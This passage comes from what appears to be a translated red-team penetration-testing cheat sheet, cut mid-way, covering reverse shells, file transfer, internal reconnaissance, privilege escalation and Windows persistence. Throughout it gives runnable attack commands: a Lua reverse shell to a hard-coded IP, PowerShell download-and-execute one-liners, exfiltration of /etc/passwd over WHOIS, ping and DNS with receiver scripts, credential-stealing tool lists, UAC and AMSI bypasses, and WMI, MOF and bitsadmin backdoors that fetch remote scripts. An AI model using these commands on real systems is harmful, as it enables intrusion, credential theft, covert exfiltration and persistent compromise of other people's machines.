listenport 1>/tmp/backpipe\n```\n\nlua \n```\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 
2>&3');\"\n```\n\nSCTP reverse shell\n```\n# https://github.com/srat1999/sctp-shell\n# server \nsudo ./scp-shell -s -lp 443 -a 192.168.0.189\n# client\n./scp-shell -a 192.168.0.189 -lp 56738 -rp 443\n```\n\nFully interactive reverse shell with PowerShell\n```\n# server \nstty raw -echo; (stty size; cat) | nc -lvnp 3001\n# client\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001\n```\n\n### Transferring and Downloading Files Inside the Network   \nwput \n```\nwput dir_name ftp://linuxpig:123456@host.com/\n```\nwget \n```\nwget http://site.com/1.rar -O 1.rar\n```\naria2c (needs to be installed) \n```\naria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2\n```\npowershell\n```\n$p = New-Object System.Net.WebClient \n$p.DownloadFile(\"http://domain/file\",\"$env:HOMEPATH\\file\") \n```\n\nUploading files back\n```\nStart a PHP server: php -S 0.0.0.0:8888\n# upload.php, saved in the directory the server is started from:\n<?php\n$file = date(\"Hism\");\nfile_put_contents($file, file_get_contents(\"php://input\"));\n\nUpload from PowerShell: powershell iwr ip:8888/upload.php -method POST -infile C:\\xx\\xx\\xx.zip\n```\nDownloading files\n```\npowershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://95.163.202.147:8000/vendor.jsp', 'a.jsp')\n```\n\nDownload and execute\n```\npowershell IEX (New-Object System.Net.Webclient).DownloadString('http://95.163.202.147:8000/ooo.ps1')\npowershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')\n```\n\nVBS script \n```\nSet args = Wscript.Arguments\nUrl = \"http://domain/file\"\ndim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", Url, False\nxHttp.Send\nwith bStrm\n.type = 1 ' adTypeBinary\n.open\n.write xHttp.responseBody\n.savetofile \"C:\\%homepath%\\file\", 2 ' adSaveCreateOverWrite\nend with\n```\n>Run: cscript test.vbs\n\nPerl \n```\n#!/usr/bin/perl \nuse LWP::Simple; \ngetstore(\"http://domain/file\", \"file\");\n```\n>Run: perl test.pl\n\nPython \n```\n#!/usr/bin/python \nimport urllib2 \nu = 
urllib2.urlopen('http://domain/file') \nlocalFile = open('local_file', 'wb') \nlocalFile.write(u.read()) \nlocalFile.close()\n```\n>Run: python test.py\n\nRuby \n```\n#!/usr/bin/ruby\nrequire 'net/http'\nNet::HTTP.start(\"www.domain.com\") { |http|\nr = http.get(\"/file\")\nopen(\"save_location\", \"wb\") { |file|\nfile.write(r.body)\n}\n}\n```\n>Run: ruby test.rb\n\nPHP \n```\n<?php\n$url  = 'http://www.example.com/file';\n$path = '/path/to/file';\n$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n$data = curl_exec($ch);\ncurl_close($ch);\nfile_put_contents($path, $data);\n?>\n```\n>Run: php test.php\n\nNC \nattacker \n```\ncat file | nc -l 1234\n```\ntarget\n```\nnc host_ip 1234 > file\n```\nFTP (interactive session)\n```\nftp 127.0.0.1\nusername\npassword\nget file\nexit\n```\nTFTP (source file on the TFTP server first, then the local destination) \n```\ntftp -i host GET location_of_file_on_tftp_server C:%homepath%\\file\n```\nBitsadmin \n```\nbitsadmin /transfer n http://domain/file c:%homepath%\\file\n```\nWindows file share \n```\nnet use x: \\\\\\\\127.0.0.1\\\\share /user:example.com\\\\userID myPassword\n```\nSCP \nlocal to remote \n```\nscp file user@host.com:/tmp\n```\nremote to local \n```\nscp user@host.com:/tmp/file file\n```\nrsync \ncopy from a remote rsync server to the local machine \n```\nrsync -av root@192.168.78.192::www /databack\n```\ncopy from the local machine to a remote rsync server \n```\nrsync -av /databack root@192.168.78.192::www\n```\ncertutil.exe \n```\ncertutil.exe -urlcache -split -f http://site.com/file\n```\ncopy\n```\ncopy \\\\\\\\IP\\\\ShareName\\\\file.exe file.exe\n```\nWHOIS\nReceiver, host B:\n```\nnc -vlnp 1337 | sed \"s/ //g\" | base64 -d \n```\nSender, host A:\n```\nwhois -h host_ip -p 1337 `cat /etc/passwd | base64`\n```\n\n[WHOIS + TAR](https://twitter.com/mubix/status/1102780436118409216)\nFirst:  \n```\nncat -k -l -p 4444 | tee files.b64  #tee to a file so you can make sure you have it\n```\n\nNext\n```\ntar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits\n```\n\nFinally\n```\ncat files.b64 | tr -d '\\r\\n' | base64 -d | tar zxv #to get the files 
out\n```\n\nPING\nSender:\n```\nxxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done\n```\nReceiver `ping_receiver.py` (run as root; ping repeats the 4-byte pattern to fill the 56-byte payload, and 56 is a multiple of 4, so the last 4 bytes are exactly one copy of the chunk):\n```\nimport sys\n\ntry:\n    from scapy.all import *\nexcept ImportError:\n    print(\"Scapy not found, please install scapy: pip install scapy\")\n    sys.exit(0)\n\n\ndef process_packet(pkt):\n    # ICMP type 8 = echo request; the pattern bytes are in the Raw payload\n    if pkt.haslayer(ICMP) and pkt.haslayer(Raw):\n        if pkt[ICMP].type == 8:\n            data = pkt[Raw].load[-4:]\n            print(data.decode(\"utf-8\", errors=\"replace\"), flush=True, end=\"\")\n\nsniff(iface=\"eth0\", filter=\"icmp\", prn=process_packet)\n```\n```\npython3 ping_receiver.py\n```\n\nDIG\nSender (31 bytes per chunk = 62 hex characters, just under the 63-character DNS label limit):\n```\nxxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done\n```\nReceiver `dns_receiver.py` (run as root on 172.16.1.100):\n```\nimport sys\n\ntry:\n    from scapy.all import *\nexcept ImportError:\n    print(\"Scapy not found, please install scapy: pip install scapy\")\n    sys.exit(0)\n\ndef process_packet(pkt):\n    if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):\n        domain = pkt[DNS][DNSQR].qname.decode('utf-8')\n        root_domain = domain.split('.')[1]\n        if root_domain.startswith('gooogle'):\n            # strip the trailing '.gooogle.com.' (13 characters) and decode the hex label\n            print(bytearray.fromhex(domain[:-13]).decode(\"utf-8\", errors=\"replace\"), flush=True, end='')\n\nsniff(iface=\"eth0\", filter=\"udp port 53\", prn=process_packet)\n```\n```\npython3 dns_receiver.py\n```\n\n[Upload-Go-Fileserver](https://github.com/OlivierLaflamme/Upload-Go-Fileserver)\n```\ngo run fileserver.go -port 4040 -pass password -user username\n```\n... \n### Running an HTTP Server\npython2\n```\npython -m SimpleHTTPServer 1337\n```\npython3\n```\npython -m http.server 1337\n```\nPHP 5.4+\n```\nphp -S 0.0.0.0:1337\n```\nruby\n```\nruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'\n```\n```\nruby -run -e httpd . -p 1337\n```\nPerl\n```\nperl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount(\"/\"=>{path=>\".\"}); $s->start'\n```\n```\nperl -MIO::All -e 'io(\":8080\")->fork->accept->(sub { $_[0] < io(-x $1 ? \"./$1 |\" : $1) if /^GET \\/(.*) / })'\n```\nbusybox httpd\n```\nbusybox httpd -f -p 8000\n```\npwndrop -- a very handy server for hosting and delivering payloads\n```\n# https://github.com/kgretzky/pwndrop\n```\nSwego -- file upload/download server written in Go\n```\n# https://github.com/nodauf/Swego\n./webserver\n```\nSimpleHTTPserver -- written in Go\n```\n# https://github.com/projectdiscovery/simplehttpserver\nsimplehttpserver\n```\n\n\n\n## Internal Network Information Gathering \n\n### Local Host Enumeration\n#### 1. User list\nWindows user list \nAnalyze mail users: internal (domain) mail users are usually the internal (domain) users \n\n#### 2. Process list\nIdentify antivirus/security monitoring tools, etc. \nMail clients \nVPN \nFTP, etc.  \n\n#### 3. Service list \nServices belonging to security tools (check whether they can be stopped manually, etc.)\nProblematic services (permissions/vulnerabilities)\n\n#### 4. Port list\nCommon services/applications behind the open ports (anonymous access/permissions/vulnerabilities, etc.)\nUse the open ports for further information gathering\n\n#### 5. Patch list\nAnalyze installed Windows patches\nVulnerabilities in third-party software (Java/Oracle/Flash, etc.)\n\n#### 6. Local shares\nLocal share list/access permissions\nDomain shares accessed from this host/access permissions\n\n#### 7. User habits \nHistory \nBookmarks \nDocuments, etc. \n\n#### 8. Tools for obtaining the current user's passwords \n\n##### Windows\n* [mimikatz](https://github.com/gentilkiwi/mimikatz)  \n* [wce](https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64)  \n* [Invoke-WCMDump](https://github.com/peewpw/Invoke-WCMDump)\n* [mimiDbg](https://github.com/giMini/mimiDbg)\n* [LaZagne](https://github.com/AlessandroZ/LaZagne)\n* [nirsoft_package](http://launcher.nirsoft.net/downloads/)\n* [QuarksPwDump](https://github.com/quarkslab/quarkspwdump) [fgdump](https://github.com/mcandre/fgdump)\n* Asterisk password revealers\n* [Browser passwords -- HackBrowserData](https://github.com/moonD4rk/HackBrowserData)\n* [Browser passwords -- BrowserGhost](https://github.com/QAX-A-Team/BrowserGhost)\n* [Browser passwords -- SharpChromium](https://github.com/djhohnstein/SharpChromium)\n* [Browser passwords -- chromepass](https://github.com/darkarp/chromepass) -- retrieves and decrypts cookies and passwords saved by Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi\n* [GetPwd](https://github.com/sf197/GetPwd) -- retrieves passwords from Navicat, TeamViewer, Xshell and SecureCRT\n* [FireFox-Thief](https://github.com/LimerBoy/FireFox-Thief) -- passwords, cookies, history, bookmarks\n* [Adamantium-Thief](https://github.com/LimerBoy/Adamantium-Thief) -- passwords, credit cards, history, cookies, bookmarks, autofill\n* 
[goLazagne](https://github.com/kerbyj/goLazagne) -- Browsers[Chromium-based;Mozilla Firefox;Internet Explorer and Edge]/Mail[Thunderbird ; [TBD] Outlook]/Windows[Credential Manager]/SysAdmin tools[Mobaxterm;Putty;Filezilla;Openssh]/WiFi passwords\n\n##### Linux\n* [LaZagne](https://github.com/AlessandroZ/LaZagne)  \n* [mimipenguin](https://github.com/huntergregal/mimipenguin)\n\n### Information gathering for lateral spread \n#### Port scanning \n##### Common port scanning tools \n* [nmap](https://nmap.org/) \n* [masscan](https://github.com/robertdavidgraham/masscan) \n* [zmap](https://github.com/zmap/zmap)\n* s scanner \n* Custom scripts, etc. \n* NC \n* Routerscan\n* SScan2.exe\n* [Perun](https://github.com/WyAtu/Perun) -- can be packaged as an exe and uploaded to the target for scanning\n* [AssetScan](https://github.com/JE2Se/AssetScan) -- includes weak-password detection\n* [ServerScan](https://github.com/Adminisme/ServerScan) -- can be combined with the [CrossC2](https://github.com/gloxec/CrossC2) project in CS 3.14 for cross-platform scanning\n* [netscan](https://github.com/jessfraz/netscan) -- subnet port scanner written in Go\n* [fscan](https://github.com/shadow1ng/fscan)\n* ...\n##### NIC information scanning (port 135 open)\n* [Ladon](https://github.com/k8gege/Ladon)\n\n#### Internal network topology analysis\n* DMZ\n* Management network\n* Production network\n* Test network\n\n#### Common information gathering commands \nipconfig:\n```\nipconfig /all ------\u003e query the local IP range, domain membership, etc.\n```\nnet:\n```\nnet user ------\u003e local user list\nnet localgroup administrators ------\u003e local administrators [usually includes domain users]\nnet user /domain ------\u003e query domain users\nnet group /domain ------\u003e query the groups in the domain\nnet group \"domain admins\" /domain ------\u003e query the domain admins group\nnet localgroup administrators /domain ------\u003e domain admins that have logged on to this host\nnet localgroup administrators workgroup\\user001 /add -----\u003e add a domain user to the local administrators group \nnet group \"domain controllers\" -------\u003e view the domain controllers (if there are several)\nnet view ------\u003e list the machines in the same domain \nnet view /domain ------\u003e list the domains\nnet view \u0026 net group \"domain computers\" /domain ------\u003e list the computers in the current domain; the second command returns more\nnet view /domain:domainname\nnet view \\\\dc   view the shares on the DC\nnet time /domain \nnet config workstation   current logon domain - computer name - user name\nnet use \\\\DC(e.g. pc.xx.com) password /user:xxx.com\\username   equivalent to logging on to a domain host with this account; its resources become accessible\n```\ndsquery \n```\ndsquery 
computer domainroot -limit 65535 \u0026\u0026 net group \"domain computers\" /domain ------\u003e list all machine names in the domain\ndsquery user domainroot -limit 65535 \u0026\u0026 net user /domain ------\u003e list all user names in the domain\ndsquery subnet ------\u003e list the subnets in the domain\ndsquery group \u0026\u0026 net group /domain ------\u003e list the groups in the domain \ndsquery ou ------\u003e list the organizational units in the domain \ndsquery server \u0026\u0026 net time /domain ------\u003e list the domain controllers in the domain \n```\nquery\n```\nquery user || qwinsta ------\u003e view the currently logged-on users\n```\ntasklist\n```\ntasklist /svc\ntasklist /S ip /U domain\\username /P /V   view the tasklist of a remote computer\n```\n\n### Third-party information gathering \n* NETBIOS information gathering \n* SMB information gathering  \n* Null-session information gathering  \n* Vulnerability information gathering, etc. \n* Set up your own DNS server to obtain the IPs behind internal domain names\n    Reference project: [DNS SOCKS Proxy](https://github.com/jtripper/dns-tcp-socks-proxy)\n    After editing the configuration file, internal domain names can be queried with: `dig @\u003cIP of the host running this project\u003e -p \u003cport set in the configuration file\u003e A +short \u003cinternal domain name\u003e`\n* Searching for key files on hosts and their contents\n    Reference project: [SharpSearch](https://github.com/djhohnstein/SharpSearch)\n    \n\n## Privilege escalation \n\n### Windows \n#### BypassUAC \n##### Common methods \n* Use the IFileOperation COM interface\n* Use the extract option of Wusa.exe\n* Remotely inject SHELLCODE into a puppet process\n\u003e [C_Shot](https://github.com/anthemtotheego/C_Shot)--downloads, injects and executes shellcode in memory\n* DLL hijacking, hijacking system DLL files\n* eventvwr.exe and registry hijacking\n* sdclt.exe\n* SilentCleanup\n* wscript.exe\n* cmstp.exe\n* Modify environment variables to hijack high-privilege .NET programs\n* Modify the registry key HKCU\\Software\\Classes\\CLSID to hijack high-privilege programs\n* Escalate privileges directly past UAC\n\n##### Common tools \n\n* [UACME](https://github.com/hfiref0x/UACME)\n* [Bypass-UAC](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC)\n* [Yamabiko](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko)\n* ... 
\n\n#### Bypass AMSI\n##### Common tools \n* [AmsiScanBufferBypass](https://github.com/rasta-mouse/AmsiScanBufferBypass)\n* [NetLoader--loads a binary into memory and runs it, patching AMSI at runtime and bypassing Windows Defender](https://github.com/Flangvik/NetLoader)\n\n#### Privilege escalation \n* Windows kernel exploit privilege escalation\n\u003eDetection: [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester), [WinSystemHelper](https://github.com/brianwrf/WinSystemHelper), [wesng](https://github.com/bitsadmin/wesng)\n\n\u003eExploitation: [windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits), [BeRoot](https://github.com/AlessandroZ/BeRoot.git)\n\n* Service privilege escalation \n\u003eDatabase services, FTP services, printers, etc.\n\u003eTool (escalation once a service account is held): [Juicy Potato](https://github.com/ohpe/juicy-potato)\n\u003e Windows Spooler Vulnerability that allows an elevation of privilege on Windows 7 and later -- [CVE-2020-1337](https://github.com/neofito/CVE-2020-1337)\n* Windows misconfigurations \n* Misconfigured permissions on system services \n* Insecure registry permissions \n* Insecure file/folder permissions \n* Scheduled tasks \n* Any user can install MSI packages with NT AUTHORITY\\SYSTEM privileges \n* Privilege escalation scripts \n\u003e[PowerUP](https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1),[ElevateKit](https://github.com/rsmudge/ElevateKit),[Sherlock](https://github.com/rasta-mouse/Sherlock)\n\n### Linux \n#### Kernel exploit privilege escalation \n[linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits)\n#### Scheduled tasks \n```\ncrontab -l\nls -alh /var/spool/cron\nls -al /etc/ | grep cron\nls -al /etc/cron*\ncat /etc/cron*\ncat /etc/at.allow\ncat /etc/at.deny\ncat /etc/cron.allow\ncat /etc/cron.deny\ncat /etc/crontab\ncat /etc/anacrontab\ncat /var/spool/cron/crontabs/root\n```\n#### SUID \n```\nfind / -user root -perm -4000 -print 2\u003e/dev/null\nfind / -perm -u=s -type f 2\u003e/dev/null\nfind / -user root -perm -4000 -exec ls -ldb {} \\;\n```\n#### Misconfigured permissions on system services \n```\ncat /var/apache2/config.inc\ncat /var/lib/mysql/mysql/user.MYD\ncat /root/anaconda-ks.cfg\n```\n\n#### Insecure file/folder permissions \n```\ncat ~/.bash_history\ncat ~/.nano_history\ncat ~/.atftp_history\ncat ~/.mysql_history\ncat 
~/.php_history\n```\n#### Finding stored plaintext usernames and passwords \n```\ngrep -i user [filename]\ngrep -i pass [filename]\ngrep -C 5 \"password\" [filename]\nfind . -name \"*.php\" -print0 | xargs -0 grep -i -n \"var $password\" # Joomla\n```\n\n## Persistence \n\n### System backdoors \n#### Windows \n##### 1. Password logging tools \nWinlogonHack \nWinlogonHack is a tool for capturing passwords from remote 3389 (RDP) logons. Before WinlogonHack there was a GINA trojan mainly used to capture passwords on Windows 2000; WinlogonHack mainly targets Windows XP and Windows 2003 Server.\nKeyloggers \nThe purpose of installing a keylogger is not only to record the local password but to record all of the administrator's passwords, such as mailbox and web page passwords, which reveals a lot of information about the administrator.\nNTPass \nObtains the administrator password, normally via the GINA approach; on some machines software such as pcAnywhere causes remote logon failures, and this tool captures the password without that interference.\nOpenSSH backdoor on Linux \nA recompiled sshd service that records users' logon passwords.\n##### 2. Common locations for storing payloads \n**WMI** :\nStore:\n\n```\n$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\n$StaticClass.Name = 'Win32_Command'\n$StaticClass.Put()\n$StaticClass.Properties.Add('Command' , $Payload)\n$StaticClass.Put() \n```\nRead:\n```\n$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value\n```\n\n**PE files with digital signatures**\nExploit a weakness in the file hash algorithm to hide a payload inside a PE file without affecting the file's digital signature \n**Special ADS** \n…\n```\ntype putty.exe \u003e ...:putty.exe\nwmic process call create c:\\test\\ads\\...:putty.exe\n```\nSpecial COM file\n```\ntype putty.exe \u003e \\\\.\\C:\\test\\ads\\COM1:putty.exe\nwmic process call create \\\\.\\C:\\test\\ads\\COM1:putty.exe\n```\nDisk root directory\n```\ntype putty.exe \u003eC:\\:putty.exe \nwmic process call create C:\\:putty.exe\n```\n##### 3. Run/RunOnce Keys  \nUser level \n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n```\nAdministrator \n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n```\n##### 4. 
BootExecute Key \nBecause smss.exe starts before the Windows subsystem is loaded, it calls the configuration subsystem to load the current hives; the relevant registry keys are:\n```\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\hivelist\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet002\\Control\\Session Manager\n```\n##### 5. Userinit Key \nLogin scripts loaded by the WinLogon process; key:\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n```\n##### 6. Startup Keys \n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n```\n##### 7. Services \nCreate a service \n```\nsc create [ServerName] binPath= BinaryPathName\n```\n##### 8. Browser Helper Objects \nEssentially DLL modules loaded when Internet Explorer starts\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\n```\n##### 9. AppInit_DLLs \nDLLs loaded whenever User32.dll is loaded\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs\n```\n##### 10. File associations \n```\nHKEY_LOCAL_MACHINE\\Software\\Classes\nHKEY_CLASSES_ROOT\n```\n##### 11. [bitsadmin](http://www.liuhaihua.cn/archives/357579.html) \n```\nbitsadmin /create backdoor\nbitsadmin /addfile backdoor %comspec% %temp%\\cmd.exe\nbitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe \"/u /s /i:https://host.com/calc.sct scrobj.dll\"\nbitsadmin /Resume backdoor\n```\n##### 12. 
[mof](https://evi1cg.me/archives/Powershell_MOF_Backdoor.html)\n```\npragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\") \ninstance of __EventFilter as $EventFilter\n{\nEventNamespace = \"Root\\\\Cimv2\";\nName = \"filtP1\";\nQuery = \"Select * From __InstanceModificationEvent \"\n\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"\n\"And TargetInstance.Second = 1\";\nQueryLanguage = \"WQL\";\n}; \ninstance of ActiveScriptEventConsumer as $Consumer\n{\nName = \"consP1\";\nScriptingEngine = \"JScript\";\nScriptText = \"GetObject(\\\"script:https://host.com/test\\\")\";\n}; \ninstance of __FilterToConsumerBinding\n{\nConsumer = $Consumer;\nFilter = $EventFilter;\n};\n```\nRun as administrator:\n```\nmofcomp test.mof\n```\n##### 13. [wmi](https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/) \n\nRun notepad.exe every 60 seconds\n```\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\nwmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\n```\n##### 14. 
[Userland Persistence With Scheduled Tasks](https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/)  \nHijack the UserTask scheduled task so that a DLL is loaded at system startup\n```\nfunction Invoke-ScheduledTaskComHandlerUserTask\n{\n[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]\nParam (\n[Parameter(Mandatory = $True)]\n[ValidateNotNullOrEmpty()]\n[String]\n$Command,\n\n[Switch]\n$Force\n)\n$ScheduledTaskCommandPath = \"HKCU:\\Software\\Classes\\CLSID\\{58fb76b9-ac85-4e55-ac04-427593b1d060}\\InprocServer32\"\nif ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){\nNew-Item $ScheduledTaskCommandPath -Force |\nNew-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null\n}else{\nWrite-Verbose \"Key already exists, consider using -Force\"\nexit\n}\n\nif (Test-Path $ScheduledTaskCommandPath) {\nWrite-Verbose \"Created registry entries to hijack the UserTask\"\n}else{\nWrite-Warning \"Failed to create registry key, exiting\"\nexit\n} \n}\nInvoke-ScheduledTaskComHandlerUserTask -Command \"C:\\test\\testmsg.dll\" -Verbose\n```\n##### 15. [Netsh](https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/) \n```\nnetsh add helper c:\\test\\netshtest.dll\n```\nBackdoor trigger: every invocation of netsh\n\u003eDLL authoring: https://github.com/outflanknl/NetshHelperBeacon\n\n##### 16. [Shim](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/) \nCommon approaches:\nInjectDll\nRedirectShortcut\nRedirectEXE\n##### 17. [DLL hijacking](https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/)\nUse Rattler to enumerate processes automatically and detect whether any process is exploitable through DLL hijacking\nUsage: semi-automatic testing with Procmon is more accurate; a DLL generated the usual way makes the program error out or abort, while a hijack DLL built from source generated with AheadLib does not affect the program's execution\nTool: https://github.com/sensepost/rattler\nTool: https://github.com/Yonsm/AheadLib\n##### 18. 
[DoubleAgent](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/)\nWrite a custom Verifier provider DLL\nInstall it through Application Verifier\nInject into the target process and execute the payload\nThe payload runs every time the target process starts, which amounts to an autostart mechanism\nPOC : https://github.com/Cybellum/DoubleAgent\n##### 19. [waitfor.exe](https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/)\nDoes not support autostart, but can be activated remotely on demand; the background process shows up as waitfor.exe\nPOC : https://github.com/3gstudent/Waitfor-Persistence\n##### 20. [AppDomainManager](https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/) \nFor .NET programs: modifying the AppDomainManager hijacks the startup of the .NET program. If the startup of a common system .NET program such as powershell.exe is hijacked and a payload added, the result is a passively triggered backdoor\n##### 21. Office \n[Hijacking specific Office functionality](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/): through DLL hijacking, the backdoor is triggered when the Office application performs a specific function\n[Office backdoor implemented with VSTO](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8/)\n[Office add-ins](https://github.com/3gstudent/Office-Persistence)\n* Word WLL \n* Excel XLL \n* Excel VBA add-ins \n* PowerPoint VBA add-ins\n\n\u003eReference 1 : https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/\n\n\u003eReference 2 : https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/\n\n\n##### 22. [CLR](https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/)\nA backdoor that requires no administrator privileges and can hijack all .NET programs\nPOC: https://github.com/3gstudent/CLR-Injection\n##### 23. [msdtc](https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/) \nUses the MSDTC service to load a DLL, achieving autostart while evading Autoruns' detection of startup entries\nUsage: add a DLL to the %windir%\\system32\\ directory renamed as oci.dll\n##### 24. 
[Hijack CAccPropServicesClass and MMDeviceEnumerator](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/) \nUses COM objects; requires neither a reboot nor administrator privileges\nImplemented by modifying the registry\nPOC: https://github.com/3gstudent/COM-Object-hijacking \n##### 25. [Hijack explorer.exe](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/)\nCOM object hijacking; requires neither a reboot nor administrator privileges\nImplemented by modifying the registry\n```\nHKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\nHKCU\\Software\\Classes\\CLSID\\{fbeb8a05-beee-4442-804e-409d6c4515e9}\nHKCU\\Software\\Classes\\CLSID\\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\nHKCU\\Software\\Classes\\Wow6432Node\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\n```\n##### 26. Windows FAX DLL Injection \nThrough DLL hijacking, hijack Explorer.exe's loading of `fxsst.dll`\nExplorer.exe loads `c:\\Windows\\System32\\fxsst.dll` at startup (the service is enabled by default and used for the fax service). Saving payload.dll as `c:\\Windows\\fxsst.dll` achieves DLL hijacking of Explorer.exe's loading of `fxsst.dll`\n##### 27. Special registry values \nCreate registry values with special names under the startup keys; a user normally cannot read them (via the Win32 API), but the system can still execute them (via the Native API).\n\n[Penetration tricks: creating \"hidden\" registry keys](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/)\n\n[Penetration tricks: further tests of \"hidden\" registry 